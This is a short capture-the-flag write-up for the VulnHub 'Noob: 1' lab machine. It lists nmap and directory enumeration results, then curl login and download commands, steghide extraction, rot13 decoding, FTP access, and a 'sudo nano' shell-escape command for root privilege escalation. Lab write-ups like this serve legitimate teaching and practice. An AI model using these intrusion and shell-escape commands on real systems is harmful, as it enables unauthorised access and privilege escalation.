0x64azana

Write up

Name

VulnHub | Noob: 1

Writer

0x64azana

Genre

Enumeration

NMAP-RESULTS:

21/tcp open ftp vsftpd 3.0.3
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
55077/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)

SUBDIR-ENUMS:

N/A

DIR-ENUMERATIONS:

/go.php (Status: 200) [Size: 0]
/index.php (Status: 302) [Size: 0] [--> index.html]
/logout.php (Status: 302) [Size: 0] [--> index.html]
/server-status (Status: 403) [Size: 278]

Exploitation:

1. curl -c cookies.txt -d "username=champ&password=password" -X POST http://192.168.2.253/go.php && curl -b cookies.txt -O http://192.168.2.253/downloads.rar
2. unrar e downloads.rar
3. steghide extract -sf funny.bmp -p sudo
4. cat user.txt
5. rot13 user.txt
6. ftp wtf@192.168.2.253
7. > this one is a simple one

PRIV-ESC:

# AS N00B[wtf] THROUGH SSH
sudo nano
^R^X
reset; sh 1>&0 2>&0

Hope you enjoyed the read!